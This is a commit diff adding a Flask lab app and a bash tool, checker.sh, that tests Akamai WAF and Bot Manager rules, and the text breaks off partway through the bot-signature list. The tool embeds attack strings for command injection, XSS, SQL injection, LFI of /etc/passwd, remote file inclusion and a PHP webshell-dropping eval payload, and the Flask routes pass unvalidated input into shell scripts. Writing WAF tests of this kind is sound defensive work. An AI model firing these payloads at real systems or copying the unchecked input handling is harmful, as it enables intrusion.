Compare commits
2 Commits
0051b28727
...
83ddb53c71
Author | SHA1 | Date |
---|---|---|
Sangmin Kim | 83ddb53c71 | |
Sangmin Kim | e0a4535e49 |
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,69 @@
|
|||
# This is the Flask app.py file that runs a web server and returns "Hello World"
|
||||
from flask import Flask, request, render_template
|
||||
import subprocess
|
||||
app = Flask(__name__)
|
||||
|
||||
doc_root = '/root/origin-33/flask/scripts'
|
||||
|
||||
@app.route('/lab/bm',methods = ['GET'])
|
||||
def bm():
|
||||
return render_template('bm.html')
|
||||
|
||||
@app.route('/lab/ivm',methods = ['GET'])
|
||||
def ivm():
|
||||
return render_template('ivm.html')
|
||||
|
||||
@app.route('/lab/bm/run',methods = ['GET'])
|
||||
def bm_run():
|
||||
property = request.args.get('property')
|
||||
property = str(property)
|
||||
print(property)
|
||||
script = f'{doc_root}/mychecker.sh'
|
||||
args = ['-c', f'{doc_root}/bm.conf', property]
|
||||
output = subprocess.check_output ([script] + args, shell=False)
|
||||
output = output.decode('utf-8')
|
||||
print (output)
|
||||
output = output.splitlines()
|
||||
return output
|
||||
|
||||
@app.route('/lab/ivm/generate',methods = ['GET'])
|
||||
def ivm_generate_image():
|
||||
property = request.args.get('property')
|
||||
property = str(property)
|
||||
print(property)
|
||||
script = f"{doc_root}/generate.sh"
|
||||
args = [property]
|
||||
output = subprocess.check_output ([script] + args, shell=False)
|
||||
output = output.decode('utf-8')
|
||||
print (output)
|
||||
output = output.splitlines()
|
||||
return output
|
||||
|
||||
@app.route('/lab/ivm/replace_image',methods = ['GET'])
|
||||
def ivm_replace_image():
|
||||
property = request.args.get('property')
|
||||
property = str(property)
|
||||
print(property)
|
||||
script = f"{doc_root}/replaceImage.sh"
|
||||
args = [property]
|
||||
output = subprocess.check_output ([script] + args, shell=False)
|
||||
output = output.decode('utf-8')
|
||||
print (output)
|
||||
output = output.splitlines()
|
||||
return output
|
||||
|
||||
@app.route('/lab/ivm/replace_video',methods = ['GET'])
|
||||
def ivm_replace_video():
|
||||
property = request.args.get('property')
|
||||
property = str(property)
|
||||
print(property)
|
||||
script = f"{doc_root}/replaceVideo.sh"
|
||||
args = [property]
|
||||
output = subprocess.check_output ([script] + args, shell=False)
|
||||
output = output.decode('utf-8')
|
||||
print (output)
|
||||
output = output.splitlines()
|
||||
return output
|
||||
|
||||
if __name__ == '__main__':
|
||||
app.run()
|
|
@ -0,0 +1,13 @@
|
|||
#! /bin/bash
|
||||
#
|
||||
# For information about the configuration options use:
|
||||
# ./checker.sh -m
|
||||
#
|
||||
# Format example:
|
||||
# bms p GET https://www.akamai.com / krs-cmd
|
||||
bms s GET http://$1.akamai-lab.com / aka-arb
|
||||
bms s GET http://$1.akamai-lab.com / aka-seo
|
||||
bms s GET http://$1.akamai-lab.com / aka-eco
|
||||
bms s GET http://$1.akamai-lab.com / tra-ikb
|
||||
bms s GET http://$1.akamai-lab.com / tra-hbt
|
||||
bms s GET http://$1.akamai-lab.com / act-cok
|
|
@ -0,0 +1,10 @@
|
|||
#! /bin/bash
|
||||
|
||||
cd /usr/share/nginx/html/learn
|
||||
cp cream.png.bak $1_dog.png
|
||||
echo cream > $1_dog.txt
|
||||
echo $1'_newDog: cream'
|
||||
|
||||
cp globe.mp4.bak $1_video.mp4
|
||||
echo globe > $1_video.txt
|
||||
echo $1'_newVideo: globe'
|
|
@ -0,0 +1,555 @@
|
|||
#! /bin/bash
|
||||
function logo()
|
||||
{
|
||||
echo " _ _ "
|
||||
echo " | | | | "
|
||||
echo " ___| |__ ___ ___| | _____ _ __ "
|
||||
echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|"
|
||||
echo "| (__| | | | __/ (__| < __/ | "
|
||||
echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0"
|
||||
echo ""
|
||||
}
|
||||
function help()
|
||||
{
|
||||
logo
|
||||
echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier"
|
||||
echo "Please check the information below in order to configure the proper parameters."
|
||||
echo
|
||||
echo "checker.sh -c [<file>] -r [<reference>] -v -e -d -m"
|
||||
echo ""
|
||||
echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option"
|
||||
echo ""
|
||||
echo "Optional:"
|
||||
echo "-r Identifier added to the referer header to filter in WSA."
|
||||
echo "-v Verbose mode."
|
||||
echo "-e Export results to a CSV file."
|
||||
echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)."
|
||||
echo "-m Print manual."
|
||||
echo ""
|
||||
}
|
||||
function helpconf()
|
||||
{
|
||||
logo
|
||||
echo "This script reads a configuration file that uses the following 6 block of data per line:"
|
||||
echo ""
|
||||
echo "[type] [environment] [method] [URL] [path] [arguments(optional)]"
|
||||
echo ""
|
||||
echo "Examples:"
|
||||
echo "atg p GET http://www.{akamaized domain}.com / krs-cmd"
|
||||
echo "bms s GET http://www.{akamaized domain}.com / aka-arb"
|
||||
echo "bmp p POST http://www.{akamaized domain}.com / foo=bar"
|
||||
echo "man s GET http://www.{akamaized domain}.com /?foo=bar"
|
||||
echo "man p POST http://www.{akamaized domain}.com / foo=bar"
|
||||
echo ""
|
||||
echo "Available options:"
|
||||
echo "--------------------------------------------------------------------------------------"
|
||||
echo "type The type of control that will be tested, options are:"
|
||||
echo " atg -- WAF Attack Groups"
|
||||
echo " bms -- Bot Manager Standard"
|
||||
echo " bmp -- Bot Manager Premier"
|
||||
echo " man -- Manual test"
|
||||
echo "environment Destination of the request to be generated, options are:"
|
||||
echo " s -- Staging environment"
|
||||
echo " p -- Production environment"
|
||||
echo "method Method expected on Akamai for the tested URL, options are: GET or POST"
|
||||
echo "url URL to test, the protocol (http or https) needs to be used"
|
||||
echo "path Path to test (use / if no specific path)"
|
||||
echo "arguments For atg:"
|
||||
echo " krs-cmd -- Command Injection"
|
||||
echo " krs-xss -- Cross-Site Scripting"
|
||||
echo " krs-dos -- DDOS"
|
||||
echo " krs-iht -- Invalid HTTP"
|
||||
echo " krs-php -- PHP Injection"
|
||||
echo " krs-rfi -- Remote File Inclusion"
|
||||
echo " krs-sql -- SQL Injection"
|
||||
echo " krs-trj -- Trojan"
|
||||
echo " aag-wat -- Web Attack Tool"
|
||||
echo " aag-wpr -- Web Protocol Attack"
|
||||
echo " aag-sql -- SQL Injection"
|
||||
echo " aag-xss -- Cross-Site Scripting"
|
||||
echo " aag-lfi -- Local File Inclusion"
|
||||
echo " aag-rfi -- Remote File Inclusion"
|
||||
echo " aag-cmi -- Command Injection"
|
||||
echo " aag-wpl -- Web Platform Attack"
|
||||
echo " penalty -- Penalty test (no attack)"
|
||||
echo " For bms:"
|
||||
echo " aka-arb -- Academic or Research Bots"
|
||||
echo " aka-asc -- Automated Shopping Cart and Sniper Bots"
|
||||
echo " aka-bib -- Business Intelligence Bots"
|
||||
echo " aka-eco -- E-Commerce Search Engine Bots"
|
||||
echo " aka-eag -- Enterprise Data Aggregator Bots"
|
||||
echo " aka-fia -- Financial Account Aggregator Bots"
|
||||
echo " aka-fis -- Financial Services Bots"
|
||||
echo " aka-job -- Job Search Engine Bots"
|
||||
echo " aka-mda -- Media or Entertainment Search Bots"
|
||||
echo " aka-new -- News Aggregator Bots"
|
||||
echo " aka-onl -- Online Advertising Bots"
|
||||
echo " aka-rss -- RSS Feed Reader Bots"
|
||||
echo " aka-seo -- SEO, Analytics or Marketing Bots"
|
||||
echo " aka-sit -- Site Monitoring and Web Development Bots"
|
||||
echo " aka-soc -- Social Media or Blog Bots"
|
||||
echo " aka-war -- Web Archiver Bots"
|
||||
echo " aka-wse -- Web Search Engine Bots"
|
||||
echo " tra-ikb -- Impersonators of Known Bots"
|
||||
echo " tra-dvf -- Development Frameworks"
|
||||
echo " tra-htl -- HTTP Libraries"
|
||||
echo " tra-wsl -- Web Services Libraries"
|
||||
echo " tra-osc -- Open Source Crawlers/Scraping Platforms"
|
||||
echo " tra-hbt -- Headless Browsers/Automation Tools"
|
||||
echo " tra-dcb -- Declared Bots (Keyword Match)"
|
||||
echo " tra-agc -- Aggressive Web Crawlers"
|
||||
echo " tra-req -- Request Anomaly"
|
||||
echo " act-cok -- Cookie Integrity Failed"
|
||||
echo " For bmp:"
|
||||
echo " List of body parameters used by the endpoint (if any)"
|
||||
echo " For man:"
|
||||
echo " If using POST, list of body parameters"
|
||||
}
|
||||
function readconfig
|
||||
{
|
||||
if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi
|
||||
while IFS=' ' read -ra line || [ -n "$line" ];
|
||||
do
|
||||
[[ "$line" =~ ^(#.*|^$)$ ]] && continue
|
||||
for i in "${line[@]}"; do
|
||||
test_string+=("$i")
|
||||
done
|
||||
if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi
|
||||
test_string[3]='http://'$property'.akamai-lab.com'
|
||||
# echo $test_string[3]
|
||||
protocol=""
|
||||
sleepsec=5
|
||||
if [[ ${test_string[3]} =~ ^http:// ]];
|
||||
then
|
||||
host=${test_string[3]:7};
|
||||
protocol=${test_string[3]:0:4};
|
||||
fi
|
||||
if [[ ${test_string[3]} =~ ^https:// ]];
|
||||
then
|
||||
host=${test_string[3]:8};
|
||||
protocol=${test_string[3]:0:5};
|
||||
fi
|
||||
|
||||
if [[ $host == '' ]]; then
|
||||
echo "Oops... did't find any valid protocol."
|
||||
exit
|
||||
fi
|
||||
env=""
|
||||
if [[ ${test_string[1]} == 'p' ]]; then
|
||||
env="Production"
|
||||
if [[ $protocol == 'http' ]]; then resolve 1; fi
|
||||
if [[ $protocol == 'https' ]]; then resolve 2; fi
|
||||
elif [[ ${test_string[1]} == 's' ]]; then
|
||||
env="Staging"
|
||||
if [[ $protocol == 'http' ]]; then resolve 3; fi
|
||||
if [[ $protocol == 'https' ]]; then resolve 4; fi
|
||||
else
|
||||
echo "Oops... not a valid environment."
|
||||
exit
|
||||
fi
|
||||
test_string=()
|
||||
if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi
|
||||
sleep $sleepsec
|
||||
done < "$filecnf"
|
||||
}
|
||||
function resolve()
|
||||
{
|
||||
xpass=0
|
||||
if [[ $1 == 1 ]]; then
|
||||
if [[ $PFIP == '' ]]; then
|
||||
dig="dig +short $PFFQ | tail -n1"
|
||||
PFIPi=$(eval $dig)
|
||||
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi
|
||||
else
|
||||
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
|
||||
if [[ $xpass == 1 ]]; then
|
||||
iparray=(${PFIP//:/ })
|
||||
PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
|
||||
fi
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi
|
||||
fi
|
||||
curl $PFIPi
|
||||
elif [[ $1 == 2 ]]; then
|
||||
if [[ $PEIP == '' ]]; then
|
||||
dig="dig +short $PEFQ | tail -n1"
|
||||
PEIPi=$(eval $dig)
|
||||
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi
|
||||
else
|
||||
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
|
||||
if [[ $xpass == 1 ]]; then
|
||||
iparray=(${PEIP//:/ })
|
||||
PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
|
||||
fi
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi
|
||||
fi
|
||||
curl $PEIPi
|
||||
elif [[ $1 == 3 ]]; then
|
||||
if [[ $SFIP == '' ]]; then
|
||||
dig="dig +short $SFFQ | tail -n1"
|
||||
SFIPi=$(eval $dig)
|
||||
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi
|
||||
else
|
||||
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
|
||||
if [[ $xpass == 1 ]]; then
|
||||
iparray=(${SFIP//:/ })
|
||||
SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
|
||||
fi
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi
|
||||
fi
|
||||
curl $SFIPi
|
||||
elif [[ $1 == 4 ]]; then
|
||||
if [[ $SEIP == '' ]]; then
|
||||
dig="dig +short $SEFQ | tail -n1"
|
||||
SEIPi=$(eval $dig)
|
||||
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi
|
||||
else
|
||||
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
|
||||
if [[ $xpass == 1 ]]; then
|
||||
iparray=(${SEIP//:/ })
|
||||
SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
|
||||
fi
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi
|
||||
fi
|
||||
curl $SEIPi
|
||||
fi
|
||||
}
|
||||
function exportcsv()
|
||||
{
|
||||
if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi
|
||||
export_payload=""
|
||||
export_type=""
|
||||
for i in ${!ACRONYMA[@]}; do
|
||||
if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi
|
||||
if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi
|
||||
done
|
||||
if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi
|
||||
echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv"
|
||||
}
|
||||
function payload
|
||||
{
|
||||
PARAMHOLDER="?id=1"
|
||||
HEADERHOLDER1=""
|
||||
HEADERHOLDER2=""
|
||||
HEADERHOLDER3=""
|
||||
rules=(${1//:/ })
|
||||
for i in ${!rules[@]}; do
|
||||
case ${rules[$i]} in
|
||||
"950002") PARAMHOLDER+="&p=powershell.exe"; ;;
|
||||
"950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;;
|
||||
"950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;;
|
||||
"950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;;
|
||||
"950907") PARAMHOLDER+="&p=wget"; ;;
|
||||
"3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;;
|
||||
"3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;;
|
||||
"3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;;
|
||||
"3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;;
|
||||
"3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;;
|
||||
"3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;;
|
||||
"3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;;
|
||||
"3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;;
|
||||
"3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;;
|
||||
"3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;;
|
||||
"3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;;
|
||||
"3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;;
|
||||
"3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;;
|
||||
"3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;;
|
||||
"3000065") H10="Content-Type: text/xml"; DATAHOLDER='<command>%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n<classfactory>\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;;
|
||||
"3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;;
|
||||
"3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;;
|
||||
"950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;;
|
||||
"958000") PARAMHOLDER+="&p=.addimport"; ;;
|
||||
"958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;;
|
||||
"958002") PARAMHOLDER+="&p=.execscript"; ;;
|
||||
"958003") PARAMHOLDER+="&p=.fromcharcode"; ;;
|
||||
"958004") PARAMHOLDER+="&p=.innerhtml"; ;;
|
||||
"958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;;
|
||||
"958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;;
|
||||
"958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;;
|
||||
"958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;;
|
||||
"958009") PARAMHOLDER+="&p=%40import"; ;;
|
||||
"958010") PARAMHOLDER+="&p=activexobject"; ;;
|
||||
"958011") PARAMHOLDER+="&p=background-image%3A"; ;;
|
||||
"958012") PARAMHOLDER+="&p=copyparentfolder"; ;;
|
||||
"958013") PARAMHOLDER+="&p=createtextrange"; ;;
|
||||
"958016") PARAMHOLDER+="&p=getparentfolder"; ;;
|
||||
"958017") PARAMHOLDER+="&p=getspecialfolder"; ;;
|
||||
"958018") PARAMHOLDER+="&p=href%20javascript%3A"; ;;
|
||||
"958019") PARAMHOLDER+="&p=href%20shell%3A"; ;;
|
||||
"958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;;
|
||||
"958022") PARAMHOLDER+="&p=livescript%3A"; ;;
|
||||
"958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;;
|
||||
"958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;;
|
||||
"958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;;
|
||||
"958026") PARAMHOLDER+="&p=mocha%3A"; ;;
|
||||
"958027") PARAMHOLDER+="&p=onabort"; ;;
|
||||
"958028") PARAMHOLDER+="&p=settimeout%20("; ;;
|
||||
"958030") PARAMHOLDER+="&p=src%20http%3A"; ;;
|
||||
"958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;;
|
||||
"958032") PARAMHOLDER+="&p=src%20shell%3A"; ;;
|
||||
"958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;;
|
||||
"958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;;
|
||||
"958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;;
|
||||
"958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;;
|
||||
"958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;;
|
||||
"958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;;
|
||||
"958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;;
|
||||
"958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;;
|
||||
"958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;;
|
||||
"958046") PARAMHOLDER+="&p=url%20shell%3A"; ;;
|
||||
"958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;;
|
||||
"3000036") PARAMHOLDER+="&foo&msg=bar"; ;;
|
||||
"950116") PARAMHOLDER="%ufF12/"; ;;
|
||||
"950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;;
|
||||
"950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;;
|
||||
"950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;;
|
||||
"958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;;
|
||||
"958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;;
|
||||
"958291") HEADERHOLDER1="Range: bytes=0-"; ;;
|
||||
"958295") HEADERHOLDER1="Connection: keep-alive,close"; ;;
|
||||
"960006") H9="User-Agent;"; ;;
|
||||
"960007") H6="Host;"; ;;
|
||||
"960008") H6="Host:"; ;;
|
||||
"960009") H9="User-Agent:"; ;;
|
||||
"960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; ;;
|
||||
"960011") HEADERHOLDER2="Content-Length: 1000"; ;;
|
||||
"960012") HEADERHOLDER2="Content-Length:"; ;;
|
||||
"960016") HEADERHOLDER2="Content-Length: checker"; ;;
|
||||
"960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;;
|
||||
"960034") PROTOCOLHOLDER="--httpX.X"; ;;
|
||||
"960038") HEADERHOLDER1="Content-Range: test"; ;;
|
||||
"960901") PARAMHOLDER+="&one=more"; ;;
|
||||
"960902") HEADERHOLDER3="Content-Encoding: Identity"; ;;
|
||||
"958976") PARAMHOLDER+="¤t={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;;
|
||||
"958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;;
|
||||
"959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;;
|
||||
"3000003") PARAMHOLDER+="&p=base64_decode("; ;;
|
||||
"3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;;
|
||||
"950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;;
|
||||
"950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
|
||||
"950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;;
|
||||
"950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
|
||||
"950001") PARAMHOLDER+="&p=dbms_java"; ;;
|
||||
"950007") PARAMHOLDER+="&p=attnotnull"; ;;
|
||||
"950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;;
|
||||
"950908") PARAMHOLDER+="&p=coalesce"; ;;
|
||||
"959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;;
|
||||
"959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;;
|
||||
"959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;;
|
||||
"959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;;
|
||||
"981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;;
|
||||
"950110") HEADERHOLDER1="x_file: test"; ;;
|
||||
"950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;;
|
||||
"watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;;
|
||||
"wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;;
|
||||
"sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;;
|
||||
"xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;;
|
||||
"lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;;
|
||||
"rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;;
|
||||
"cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;;
|
||||
"wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;;
|
||||
*) PARAMHOLDER="" ; ;;
|
||||
esac
|
||||
done
|
||||
}
|
||||
function curl
|
||||
{
|
||||
shopt -s nocasematch
|
||||
if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi
|
||||
if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi
|
||||
COOKIEHOLDER=""
|
||||
HEADERHOLDER1="Connection: keep-alive"
|
||||
HEADERHOLDER2=""
|
||||
PARAMHOLDER=""
|
||||
PATHHOLDER=""
|
||||
DATAHOLDER="{'foo':'bar'}"
|
||||
UAHOLDER=""
|
||||
PROTOCOLHOLDER="--http2"
|
||||
if [ -z "$fileref" ]; then
|
||||
epoch=$(date +%s);
|
||||
else
|
||||
epoch=$fileref;
|
||||
fi
|
||||
H1="Accept: application/json"
|
||||
H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5"
|
||||
H3="Accept-Language: en-US,en;q=1.0"
|
||||
H4="Cache-Control: no-cache"
|
||||
H5="Cookie: foo=bar;"
|
||||
H6="Host: $host"
|
||||
H7="Origin: ${test_string[3]}"
|
||||
H8="Referer: $epoch"
|
||||
H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker"
|
||||
H10="Content-Type: text/plain"
|
||||
if [ ${test_string[0]} = 'atg' ]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi
|
||||
case ${test_string[5]} in
|
||||
"krs-cmd") payload "950002:950006:950011:950103:950907:3000005";;
|
||||
"krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;;
|
||||
"krs-dos") payload "3000036"; ;;
|
||||
"krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;;
|
||||
"krs-php") payload "958976:958977:959151:3000003:3000016"; ;;
|
||||
"krs-rfi") payload "950117:950118:950119:950120"; ;;
|
||||
"krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;;
|
||||
"krs-trj") payload "950110:950921"; ;;
|
||||
"aag-wat") payload "watatomic"; ;;
|
||||
"aag-wpr") payload "wpratomic"; ;;
|
||||
"aag-sql") payload "sqlatomic"; ;;
|
||||
"aag-xss") payload "xssatomic"; ;;
|
||||
"aag-lfi") payload "lfiatomic"; ;;
|
||||
"aag-rfi") payload "rfiatomic"; ;;
|
||||
"aag-cmi") payload "cmiatomic"; ;;
|
||||
"aag-wpl") payload "wplatomic"; ;;
|
||||
"penalty") payload ""; ;;
|
||||
*) echo -e 'Oops... invalid argument!'; exit; ;;
|
||||
esac
|
||||
elif [ ${test_string[0]} = 'bms' ]; then
|
||||
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi
|
||||
case ${test_string[5]} in
|
||||
"aka-arb") UAHOLDER+=" lightspeedsystems"; ;;
|
||||
"aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;;
|
||||
"aka-bib") UAHOLDER+=" companybooknetworking.com"; ;;
|
||||
"aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;;
|
||||
"aka-eag") UAHOLDER+=" shrinktheweb.com"; ;;
|
||||
"aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;;
|
||||
"aka-fis") UAHOLDER+=" drwholdings.com"; ;;
|
||||
"aka-job") UAHOLDER+=" motorelavoro.it"; ;;
|
||||
"aka-mda") UAHOLDER+=" localconditions.com"; ;;
|
||||
"aka-new") UAHOLDER+=" reader.aol.com"; ;;
|
||||
"aka-onl") UAHOLDER+=" integralads.com"; ;;
|
||||
"aka-rss") UAHOLDER+=" pocketcasts.com"; ;;
|
||||
"aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;;
|
||||
